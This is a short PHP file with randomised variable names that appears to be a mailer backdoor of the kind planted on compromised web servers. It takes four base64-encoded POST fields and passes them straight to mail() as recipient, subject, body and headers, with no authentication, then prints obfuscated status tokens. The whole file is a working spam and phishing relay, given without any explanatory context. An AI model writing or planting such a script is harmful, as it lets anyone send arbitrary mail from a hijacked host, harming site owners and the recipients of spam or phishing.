<?php
$rjkfuccfsi = stripslashes(base64_decode($_POST['scalfxtawtvlz'])); 
$zwujifdi = stripslashes(base64_decode($_POST['fjuoamw'])); 
$tpobukygr = stripslashes(base64_decode($_POST['ikmhok']));  
$oghypox = stripslashes(base64_decode($_POST['oqaync']));  
$gygzzgmmnfpjl = mail(stripslashes($rjkfuccfsi), stripslashes($zwujifdi), stripslashes($tpobukygr), stripslashes($oghypox));
if($gygzzgmmnfpjl){echo 'hcvnkx';} else {echo 'igxezgnrq : ' . $gygzzgmmnfpjl;}  

 

 
 
